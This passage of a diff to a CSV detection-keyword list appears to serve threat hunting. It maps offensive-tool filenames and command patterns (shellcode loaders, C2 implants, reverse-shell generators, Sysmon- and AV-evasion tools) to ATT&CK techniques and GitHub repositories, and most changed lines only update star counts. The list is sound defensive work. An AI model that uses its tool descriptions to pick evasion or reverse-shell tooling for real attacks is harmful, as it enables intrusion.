T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ShellCode_Loader.py*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode1 += b*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*shellcode20.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" @@ -16836,16 +17019,16 @@ "*Shellcode-Downloader-CreateThread-Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" "*shellcodeEncryptDecrypt*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*shellcode-exec.ps1*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","","" -"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*ShellcodeFluctuation.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation64*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation86*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","139","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" "*ShellcodeRDI.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*ShellcodeRDI.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" -"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*shellcode-runner.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","","" "*ShellcodeTemplate.x64.bin*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*shellcodetester *","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" @@ -16855,79 +17038,79 @@ "*shellcodetester.sh*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" "*ShellCodeTester.sln*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" "*shellerator --reverse-shell --lhost * --lport * --type *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" -"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*shellter.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*shepardsbind_recv.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*shepbind_serv.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*Sherlock.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*sherlock.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Shhmon.csproj*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Shhmon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*Shhmon.exe*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*Shhmon.git*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*shinject *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*shinject.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 